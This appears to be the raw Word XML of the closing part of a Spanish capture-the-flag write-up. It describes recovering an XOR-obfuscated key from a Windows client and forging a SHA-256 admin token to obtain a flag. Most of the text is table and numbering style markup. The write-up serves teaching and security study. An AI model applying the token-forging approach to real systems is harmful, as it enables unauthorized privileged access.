        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"data": "PENTRAZE{d270e5e966d7302319843571d7f5a36426d8153b9f6c09552ec8d1285d0bb56f}"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">El tipo de respuesta </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>FLAG</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> confirmó que el servidor aceptó el token generado y entregó el secreto protegido.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>13. Conclusión</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Data Del Más Allá se resolvió mediante ingeniería inversa del cliente Windows y reconstrucción de un mecanismo de autenticación basado en SHA-256.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El problema de seguridad fundamental consistía en que el ejecutable distribuido al cliente contenía una clave interna ofuscada mediante XOR reversible. El token administrativo podía reproducirse utilizando esa clave y el identificador de sesión proporcionado por el propio servidor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Aunque se encontraron indicios de un posible problema de gestión de memoria dinámica, no fue necesario explotar el heap. Tampoco fue necesario utilizar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>debug_ptr</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">La explotación consistió en comprender el protocolo WebSocket, recuperar la clave, reproducir el algoritmo de token y enviar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>ADMIN_CMD</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>get_flag</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Resultado: acceso al comando administrativo conseguido y flag real obtenida.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>La principal lección de este reto es que una clave secreta incorporada en un ejecutable cliente no puede considerarse confidencial. Ofuscarla mediante XOR no impide su recuperación mediante análisis estático, y utilizarla para derivar tokens privilegiados puede comprometer completamente el mecanismo de autorización.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="200"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:type w:val="nextPage"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:left="1701" w:right="850"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2"/>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isLgl/>
      <w:lvlText w:val="·"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="709" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="1429" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl/>
      <w:lvlText w:val="§"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="2149" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl/>
      <w:lvlText w:val="·"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="2869" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="3589" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl/>
      <w:lvlText w:val="§"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="4309" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl/>
      <w:lvlText w:val="·"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="5029" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="5749" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl/>
      <w:lvlText w:val="§"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="6469" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="end"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="709" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="end"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="1429" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="end"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="2149" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="end"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="2869" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="end"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="3589" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="end"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="4309" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="end"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="5029" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="end"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="5749" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="end"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="6469" w:hanging="36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s-E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s-ES"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user">
    <w:name w:val="Block Quotation (user)"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="0" w:after="283"/>
      <w:ind w:hanging="0" w:start="567" w:end="567"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="numbering" w:styleId="NoList" w:default="1">
    <w:name w:val="No List"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="table" w:styleId="12">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="665"/>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3">
    <w:name w:val="Table Grid Light"/>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1"/>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2"/>
    <w:basedOn w:val="665"/>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3"/>
    <w:basedOn w:val="665"/>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4"/>
    <w:basedOn w:val="665"/>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Plain Table 5"/>
    <w:basedOn w:val="665"/>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w:basedOn w:val="665"/>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1 Light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2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3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w:basedOn w:val="665"/>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1"/>
    <w:basedOn w:val="66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FEBF7" w:themeFill="accent1" w:themeFillTint="32"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:rPr>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="DFEBF7"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2"/>
    <w:basedOn w:val="66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3"/>
    <w:basedOn w:val="66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4"/>
    <w:basedOn w:val="66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5"/>
    <w:basedOn w:val="66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4 - Accent 6"/>
    <w:basedOn w:val="66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Accent 1"/>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4D1EC" w:themeFill="accent1" w:themeFillTint="75"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="B4D1EC" w:themeFill="accent1" w:themeFillTint="75"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="5B9BD5" w:themeFill="accent1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="5B9BD5" w:themeFill="accent1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="5B9BD5" w:themeFill="accent1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="000000" w:themeColor="light1" w:sz="4" w:space="0"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="5B9BD5"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2"/>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7C3A0" w:themeFill="accent2" w:themeFillTint="75"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="F7C3A0" w:themeFill="accent2" w:themeFillTint="75"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="ED7D31" w:themeFill="accent2"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="ED7D31" w:themeFill="accent2"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="ED7D31" w:themeFill="accent2"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="000000" w:themeColor="light1" w:sz="4" w:space="0"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="ED7D31"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 Accent 3"/>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6D6D6" w:themeFill="accent3" w:themeFillTint="75"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="D6D6D6" w:themeFill="accent3" w:themeFillTint="75"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="A5A5A5" w:themeFill="accent3"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="A5A5A5" w:themeFill="accent3"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="A5A5A5" w:themeFill="accent3"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="000000" w:themeColor="light1" w:sz="4" w:space="0"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="A5A5A5"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Accent 4"/>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E28A" w:themeFill="accent4" w:themeFillTint="75"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFE28A" w:themeFill="accent4" w:themeFillTint="75"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFC000" w:themeFill="accent4"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFC000" w:themeFill="accent4"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFC000" w:themeFill="accent4"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="000000" w:themeColor="light1" w:sz="4" w:space="0"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFC000"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5"/>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BEE4" w:themeFill="accent5" w:themeFillTint="75"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="A9BEE4" w:themeFill="accent5" w:themeFillTint="75"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="4472C4" w:themeFill="accent5"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="4472C4" w:themeFill="accent5"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="4472C4" w:themeFill="accent5"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="000000" w:themeColor="light1" w:sz="4" w:space="0"/>
        </w:tcBorders>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5 Dark - Accent 6"/>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DDBA8" w:themeFill="accent6" w:themeFillTint="75"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="BDDBA8" w:themeFill="accent6" w:themeFillTint="75"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="70AD47" w:themeFill="accent6"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="70AD47" w:themeFill="accent6"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="FFFFFF" w:fill="70AD47" w:themeFill="accent6"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="000000" w:themeColor="light1" w:sz="4" w:space="0"/>
        </w:tcBorders>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4">
    <w:name w:val="Grid Table 6 Colorful"/>
    <w:basedOn w:val="665"/>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55">
    <w:name w:val="Grid Table 6 Colorful - Accent 1"/>
    <w:basedOn w:val="66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val="404040" w:themeColor="accent1" w:themeTint="80" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="307abd" w:themeColor="accent1" w:themeTint="80" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="307abd" w:themeColor="accent1" w:themeTint="80" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:themeColor="accent1" w:sz="12" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="307abd" w:themeColor="accent1" w:themeTint="80" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="307abd"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56">
    <w:name w:val="Grid Table 6 Colorful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404040" w:themeColor="accent2" w:themeTint="97" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="cb5d12" w:themeColor="accent2" w:themeTint="97" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="cb5d12" w:themeColor="accent2" w:themeTint="97" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:themeColor="accent2" w:sz="12" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="cb5d12" w:themeColor="accent2" w:themeTint="97" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="cb5d12"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57">
    <w:name w:val="Grid Table 6 Colorful - Accent 3"/>
    <w:basedOn w:val="66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404040" w:themeColor="accent3" w:themeTint="fe" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="616161" w:themeColor="accent3" w:themeTint="fe" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="616161" w:themeColor="accent3" w:themeTint="fe" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:themeColor="accent3" w:sz="12" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="616161" w:themeColor="accent3" w:themeTint="fe" w:themeShade="95"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="616161"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58">
    <w:name w:val="Grid Table 6 Colorful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404040" w:themeColor="accent4" w:themeTint="9a" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:tblPr/>
